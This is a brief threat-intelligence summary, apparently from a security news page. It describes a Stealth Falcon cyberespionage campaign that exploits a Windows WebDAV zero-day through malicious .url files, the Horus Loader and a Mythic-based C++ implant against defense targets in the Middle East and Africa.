A sophisticated cyberespionage campaign attributed to Stealth Falcon involves a zero-day vulnerability (CVE-2025-33053) in Microsoft Windows WebDAV to infiltrate defense organizations in the Middle East and Africa. The attackers utilized malicious .url files, custom malware loaders, and a C++ implant called Horus, demonstrating advanced obfuscation and stealth techniques. #StealthFalcon #CVE-2025-33053
Keypoints
- The campaign exploits a zero-day vulnerability in Windows WebDAV to execute remote code.
- Stealth Falcon uses malicious .url files to redirect legitimate system binary execution to malware on WebDAV servers.
- The Horus Loader employs obfuscation, anti-debugging, and memory injection techniques to hide its payload.
- The Horus Agent is a C++ implant based on Mythic C2, supporting stealthy commands like data exfiltration and system surveying.
- The targets are primarily government and military entities in the Middle East and Africa, especially in Turkey, Qatar, Egypt, and Yemen.
Views: 31